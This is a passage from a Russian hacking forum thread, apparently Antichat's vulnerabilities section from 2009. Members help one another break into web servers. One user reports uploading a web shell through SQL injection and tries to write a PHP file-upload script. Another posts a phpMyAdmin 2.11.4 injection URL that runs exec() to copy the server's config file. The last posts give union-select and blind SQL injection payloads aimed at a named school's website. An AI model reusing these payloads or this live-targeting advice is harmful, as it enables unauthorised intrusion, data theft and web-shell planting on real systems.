ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10391  
Старый 24.11.2009, 17:01
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Посмотри есть ли сама качалка
Цитата:
which wget; which curl; which lynx; which links; which fetch
Код:
which which wget curl lynx links fetch
 
Ответить с цитированием

  #10392  
Старый 24.11.2009, 17:03
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

Цитата:
Сообщение от mailbrush  
Код:
which which wget curl lynx links fetch
да, спасибо, мне стало лучше, особенно
Цитата:
which which ...
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #10393  
Старый 24.11.2009, 17:05
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
да, спасибо, мне стало лучше, особенно
Цитата:
which which ...
Это чтобы проверить есть ли which, если ты не понял =\
 
Ответить с цитированием

  #10394  
Старый 24.11.2009, 17:09
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

Цитата:
Сообщение от mailbrush  
Это чтобы проверить есть ли which, если ты не понял =\
А which тебе что покажет, если его нет?
т.е. результат which which и which curl будет разный, если самого which нету? =\

З.Ы. Модеры, сорри
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #10395  
Старый 24.11.2009, 17:16
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706

Репутация: -1
По умолчанию

Хм..попробовал:

echo "copy($_FILES['filename']['tmp_name'], '/var/www/htdocs/write/9.php')" > /var/www/htdocs/write/9.php

Чет не канает...

Кстати,sudo команда доступна...Забыл добавить,что админка -
Код:
Siteman2
Там ещё фильтруются двойные кавычки,посему пришлось извращаться через селект и лить свой убогий шелл).Оттуда и выполняю команды теперь.

Последний раз редактировалось GenTao; 24.11.2009 в 17:20..
 
Ответить с цитированием

  #10396  
Старый 24.11.2009, 17:20
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

Цитата:
Сообщение от GenTao  
Хм..попробовал:

echo "copy($_FILES['filename']['tmp_name'], '/var/www/htdocs/write/9.php')" > /var/www/htdocs/write/9.php

Чет не канает...
А <? ... ?> кто напишет?
И что именно не канает? это расплывчатое понятие.
1) не загружается файл (естественно, в файле не скрипт а белиберда)
2) не пишется в сам файл
3) не могу форму сделать для загрузки файла
4) написал чушь, 9.php')" > /var/www/htdocs/write/9.php
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

PhpmyAdmin 2.11.4
  #10397  
Старый 24.11.2009, 18:14
schwarze
Познающий
Регистрация: 01.12.2008
Сообщений: 68
Провел на форуме:
484662

Репутация: 143
Отправить сообщение для schwarze с помощью ICQ
По умолчанию PhpmyAdmin 2.11.4

Есть Windows сервер с XAMPP (MySQL 5.03, phpMyAdmin 2.11.4).
Уязвимых скриптов не нашел, страницы - полуголая статика. Обратил внимание на пхпМайАдмин, порылся на ачате - нашел уязвимость, нормального описания ее найти не смог, как использовать тоже.
Кто может объяснить более подробно как использовать уязвимость или дать ссылку, где можно почитать.
P.S. я про server_databases.php?pos=0&amp;dbstats=0&amp;sort_ by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&amp;sort_order=desc&amp;token=[valid token]
 
Ответить с цитированием

  #10398  
Старый 24.11.2009, 18:46
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

тебе нужен валидный токен,т.е надо валидный логин пасс на пхп админ.
порты проскань,можешь найдешь что нить
 
Ответить с цитированием

  #10399  
Старый 24.11.2009, 20:56
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706

Репутация: -1
По умолчанию

_http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+union+select+1--&template_set=default

Чет не хочет крутиться дальше ).вывода нету,ascii тож не заюзать...
 
Ответить с цитированием

  #10400  
Старый 24.11.2009, 21:06
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

мор1ров заюзай

http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+and+if(substring(ver sion(),1,1)=5,1,(select+1+union+select+2))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ